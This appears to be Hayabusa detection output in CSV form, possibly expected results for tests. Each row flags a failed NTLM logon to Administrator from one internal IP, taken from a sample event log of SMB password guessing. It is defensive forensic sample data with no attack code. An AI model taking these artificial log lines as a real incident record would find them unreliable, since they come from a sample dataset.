+2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XslY26kw2aBw19D8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1404fakprYeqGiNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2VfIjtBcXCRlOjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPztyX4J9NV8EldT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 07flrrzWgsVBYaN2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vgkqkC1VvznGxR6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hMn6yDMLgLChJTL6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uSTokOJ31Tj0bLXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyRifC46GrNpTA4x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvNaby30vAT9drAX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wkYSOQ2bD51a4U8l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rqdOquL9Ax01RPPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nqCCiK5arcyRHha6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpyTGZLkAb0w0kgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wa2pXrZKxeZZYKAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dK0N5KeBgCze1YWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g4dHlwZjMzI5wU2s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GzF2ouP5KkRfsxnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSQxMrGlDiAOo6ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gL0rz3p1yG6RhfAT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyChoTSKgJeK6yqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG4I11dwpBM9SM3l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7foAZ5Y1igCbHap | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ATDXUljQwg8WvUVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdmXaJqQMAG2g6Ao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bjame5puT5CDeoIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0FGGVVkckmdURVh6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j0Smqw4cA4wG2Q6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLWloOhUYEQlj6y6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Tuxuykh0j5afeTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeXS6QwYhqJAOeuz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AqFSJCq5bmBW6dj1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DH1zyt1hxTgzajhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rrZxcWjUX4OgYYIb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ExtkYXSJI8F41uvw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sLh1Q3RieOoukiCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kNb2hZDxi4QrbQpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCb1TMlFj2PjH2sA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rgF42C57Nx6F3HU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KZfFH9geIrxVYowJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWz1XeyxywR0o5gS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: og1kItEC6WhqXF37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0KhaJlD6tWwF2ky | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUy0EKmjyD6ZYENA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h3MdGstPPFJDGzwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTs0ZQa6LGrKZKsY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FefzWjMXSvMdvqcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnUt9tPRSXR5mWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dehb4M6pcxi56Bkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tLXHvGiUqZyxax4W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP1gKcf1eeKm0RB1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldbN1odP77n0BOzO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: drRC8qCbPe5e4mdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lBg39AUtzZi6Q4iz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huv5YEPo1n7UiFkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9CLLwao1NDtBulxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SB88EHHhDWhvJI87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBvklueV4MZo3pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: noha7Vw85VfURHik | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wl5eIYvoKpJGUcSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsS3JTLUWcFYvxAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM6hj2bGxC124oZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3IQkVcY5iMTxCRN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v44Kp3lpGKb6Xd4j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1skdEmGlXbzUWk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feaA6lAxWjapFbAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJZjTqY5innWcvSZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymXIp0KTw0vIbB0N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpPJEcLv7BoZaQwT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cz14Cv861RhFh0Pa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H8BklDHdS0cdcbGu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0m5Mznl2khRMj31V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ha6TuN7C8V0roSAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9oBW0yE5a9zSkpIH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
